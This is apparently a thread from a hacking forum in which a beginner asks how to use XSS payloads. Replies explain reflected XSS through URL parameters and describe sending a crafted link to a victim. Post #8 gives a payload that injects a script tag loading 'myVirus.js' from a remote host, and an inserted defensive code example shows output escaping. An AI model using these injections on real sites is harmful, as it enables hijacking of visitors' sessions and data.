How to use XSS?

#1
Hello,
I found a list of XSS attacks like below:

Hidden Content

If my target is "https://www.example.com" then I should use something like "https://www.example.com/<script>alert(123);</script>"?

Thank you.
Reply

#2
as if the list repeats the same
Reply

#3
Quote:(02-21-2021, 08:53 PM)SCARIO Wrote:

as if the list repeats the same
Is "https://www.example.com/<script>alert(123);</script>" OK?
Reply

#4
Moved from the Hacking Tools forum to Website & Server Hacking.
Reply

#5
Search on GitHub
SecLists
a lot of payloads!
Reply

#6
All those are, are [To see links please register here] that could be used on any typical webpage. Where you would use them would differ based on the site and vulnerability.
Reply

#7
What's going on in all of those scripts is making a little alert box pop up saying "123", "XSS" etc. There is no actual exploit there. Those are useful, however, for when you do find an actual XSS vulnerability, to test if the page actually is vulnerable.

If you want to do any XSS exploitation, you need to learn JavaScript. In your browser, right-click on something in this page, then click "Inspect Element". You should now have a little section in the bottom or side of your browser with the HTML of this webpage. Now select the "Console" tab in the section where the code is. Now type in:


Hidden Content


And press Enter. You should see a little box pop up saying "Hello, World!". Writing JS into the console will only affect your own browser, so it is of no use for XSS, but I just thought you should see JS in action before learning about XSS.

Cross-Site Scripting (XSS) is when you are able to inject JavaScript into the webpage, usually through some user input field which can also be set in a GET request in the URL. So if there was a website which sends your input through a GET request which was also vulnerable to XSS, like a search box or something, you would put your malicious script in the search box (with "<script>" tags), and then the script would be a part of the HTML and would execute when loaded in your browser. So if the GET request was in the URL, you could copy the URL and send it to a victim and the script would run in their browser.
Reply
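
The reflected-XSS mechanism described in post #7, seen from the site owner's side, as an added example that is not part of the thread: a hypothetical search handler (the function names and the `/search?q=` route are assumptions) that reflects `q` unencoded, beside the same template with HTML output encoding, plus a check that can serve as a regression test.

```javascript
// Added example, not code from the thread. All names are hypothetical.

// Constructed sample: the alert probe quoted in the thread, prefixed with
// `">` so it also tries to close an attribute value.
const SAMPLE_QUERY = '"><script>alert(123);</script>';

// Encode the five characters that let text change HTML structure.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Read "q" from a request URL the way a server-side handler would
// (the URL parser percent-decodes the value).
function getQuery(requestUrl) {
  return new URL(requestUrl, "https://www.example.com").searchParams.get("q") || "";
}

// Vulnerable: the parameter is concatenated into the markup unchanged,
// once inside an attribute value and once as element text.
function renderSearchUnsafe(requestUrl) {
  const q = getQuery(requestUrl);
  return `<input name="q" value="${q}"><p>Results for ${q}</p>`;
}

// Hardened: same template, but every reflection is HTML-encoded first,
// so the browser treats the input as text, never as tags or attributes.
function renderSearchSafe(requestUrl) {
  const q = escapeHtml(getQuery(requestUrl));
  return `<input name="q" value="${q}"><p>Results for ${q}</p>`;
}

// Regression check: does the response contain the raw input with its
// markup characters intact? Input without such characters is not flagged.
function reflectsRaw(html, input) {
  return /[<>"']/.test(input) && html.includes(input);
}

const sampleUrl = "/search?q=" + encodeURIComponent(SAMPLE_QUERY);
console.log("unsafe reflects raw input:", reflectsRaw(renderSearchUnsafe(sampleUrl), SAMPLE_QUERY));
console.log("safe reflects raw input:  ", reflectsRaw(renderSearchSafe(sampleUrl), SAMPLE_QUERY));
console.log(renderSearchSafe(sampleUrl));
```

Escaping the double quote matters as much as escaping the angle brackets: without it the attribute reflection can still be closed early even though no tag gets through.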

#8
Quote:(05-23-2021, 01:55 PM)DedSpace Wrote:

What's going on in all of those scripts is making a little alert box pop up saying "123", "XSS" etc. There is no actual exploit there. Those are useful, however, for when you do find an actual XSS vulnerability, to test if the page actually is vulnerable.

If you want to do any XSS exploitation, you need to learn JavaScript. In your browser, right-click on something in this page, then click "Inspect Element". You should now have a little section in the bottom or side of your browser with the HTML of this webpage. Now select the "Console" tab in the section where the code is. Now type in:


Hidden Content


And press Enter. You should see a little box pop up saying "Hello, World!". Writing JS into the console will only affect your own browser, so it is of no use for XSS, but I just thought you should see JS in action before learning about XSS.

Cross-Site Scripting (XSS) is when you are able to inject JavaScript into the webpage, usually through some user input field which can also be set in a GET request in the URL. So if there was a website which sends your input through a GET request which was also vulnerable to XSS, like a search box or something, you would put your malicious script in the search box (with "<script>" tags), and then the script would be a part of the HTML and would execute when loaded in your browser. So if the GET request was in the URL, you could copy the URL and send it to a victim and the script would run in their browser.

/id?=12"><script src="http://10.10.10.8/myVirus.js" />
Reply

#9
These are just payloads. In order to execute them you need to find a vulnerable parameter, e.g. https://example.com/search?q=<script>ale.../script>
Reply




©0Day 2016 - 2023 | All Rights Reserved.